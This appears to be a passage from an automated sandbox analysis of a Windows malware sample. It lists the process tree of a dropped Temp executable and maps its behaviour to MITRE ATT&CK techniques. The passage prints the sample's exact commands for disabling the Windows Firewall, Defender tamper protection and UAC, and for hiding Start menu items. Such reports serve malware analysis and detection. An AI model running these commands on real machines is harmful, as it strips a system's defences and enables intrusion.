  "C:\Windows\System32\cmd.exe" /c reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings" /v NOC_GLOBAL_SETTING_ALLOW_TOASTS_ABOVE_LOCK /t REG_DWORD /d 0 /f
  2⤵
  PID:4260
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5284
- - C:\Windows\system32\reg.exe
    reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings" /v NOC_GLOBAL_SETTING_ALLOW_TOASTS_ABOVE_LOCK /t REG_DWORD /d 0 /f
    3⤵
    PID:4608
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings" /v NOC_GLOBAL_SETTING_ALLOW_CRITICAL_TOASTS_ABOVE_LOCK /t REG_DWORD /d 0 /f
  2⤵
  PID:2432
- - C:\Windows\system32\reg.exe
    reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings" /v NOC_GLOBAL_SETTING_ALLOW_CRITICAL_TOASTS_ABOVE_LOCK /t REG_DWORD /d 0 /f
    3⤵
    PID:3196
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings' -Name 'NOC_GLOBAL_SETTING_ALLOW_TOASTS_ABOVE_LOCK' -Value 0"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:4008
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings' -Name 'NOC_GLOBAL_SETTING_ALLOW_CRITICAL_TOASTS_ABOVE_LOCK' -Value 0"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:6120
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_ShowControlPanel /t REG_DWORD /d 0 /f
  2⤵
  PID:5892
- - C:\Windows\system32\reg.exe
    reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_ShowControlPanel /t REG_DWORD /d 0 /f
    3⤵
    PID:4500
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_ShowMyComputer /t REG_DWORD /d 0 /f
  2⤵
  PID:4744
- - C:\Windows\system32\reg.exe
    reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_ShowMyComputer /t REG_DWORD /d 0 /f
    3⤵
    PID:2356
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_ShowMyDocuments /t REG_DWORD /d 0 /f
  2⤵
  PID:3752
- - C:\Windows\system32\reg.exe
    reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_ShowMyDocuments /t REG_DWORD /d 0 /f
    3⤵
    PID:3572
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_ShowMyMusic /t REG_DWORD /d 0 /f
  2⤵
  PID:5492
- - C:\Windows\system32\reg.exe
    reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_ShowMyMusic /t REG_DWORD /d 0 /f
    3⤵
    PID:4848
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_ShowMyPictures /t REG_DWORD /d 0 /f
  2⤵
  PID:4040
- - C:\Windows\system32\reg.exe
    reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_ShowMyPictures /t REG_DWORD /d 0 /f
    3⤵
    PID:5316
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_ShowRecentDocs /t REG_DWORD /d 0 /f
  2⤵
  PID:1740
- - C:\Windows\system32\reg.exe
    reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_ShowRecentDocs /t REG_DWORD /d 0 /f
    3⤵
    PID:1324
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_ShowRun /t REG_DWORD /d 0 /f
  2⤵
  PID:4860
- - C:\Windows\system32\reg.exe
    reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_ShowRun /t REG_DWORD /d 0 /f
    3⤵
    PID:5808
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_ShowSearch /t REG_DWORD /d 0 /f
  2⤵
  PID:3916
- - C:\Windows\system32\reg.exe
    reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_ShowSearch /t REG_DWORD /d 0 /f
    3⤵
    PID:2988
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_ShowUser /t REG_DWORD /d 0 /f
  2⤵
  PID:4516
- - C:\Windows\system32\reg.exe
    reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_ShowUser /t REG_DWORD /d 0 /f
    3⤵
    PID:5352
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c NetSh Advfirewall set allprofiles state off
  2⤵
  PID:2824
- - C:\Windows\system32\netsh.exe
    NetSh Advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:5772
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v TamperProtection /t REG_DWORD /d 0 /f
  2⤵
  PID:5276
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v TamperProtection /t REG_DWORD /d 0 /f
    3⤵
    - Modifies Windows Defender TamperProtection settings
    PID:4620
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows Defender\Features' -Name 'TamperProtection' -Value 0"
  2⤵
  - Modifies Windows Defender TamperProtection settings
  - Command and Scripting Interpreter: PowerShell
  PID:720
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5304
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d 0 /f
  2⤵
  PID:2288
- - C:\Windows\system32\reg.exe
    REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d 0 /f
    3⤵
    - UAC bypass
    PID:2968
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows Defender\Features' -Name 'TamperProtection' -Value 0"
  2⤵
  - Modifies Windows Defender TamperProtection settings
  - Command and Scripting Interpreter: PowerShell
  PID:3708

C:\Users\Admin\AppData\Local\Temp\ujv1imdb.ufr.exe
C:\Users\Admin\AppData\Local\Temp\ujv1imdb.ufr.exe
1⤵
- Executes dropped EXE
PID:3732

C:\Users\Admin\AppData\Local\Temp\ujv1imdb.ufr.exe
C:\Users\Admin\AppData\Local\Temp\ujv1imdb.ufr.exe
1⤵
- Executes dropped EXE
PID:1256

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

System Services

T1569

Service Execution

T1569.002

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Disable or Modify Tools

Indicator Removal

T1070

Clear Persistence

T1070.009

File Deletion

T1070.004

Modify Registry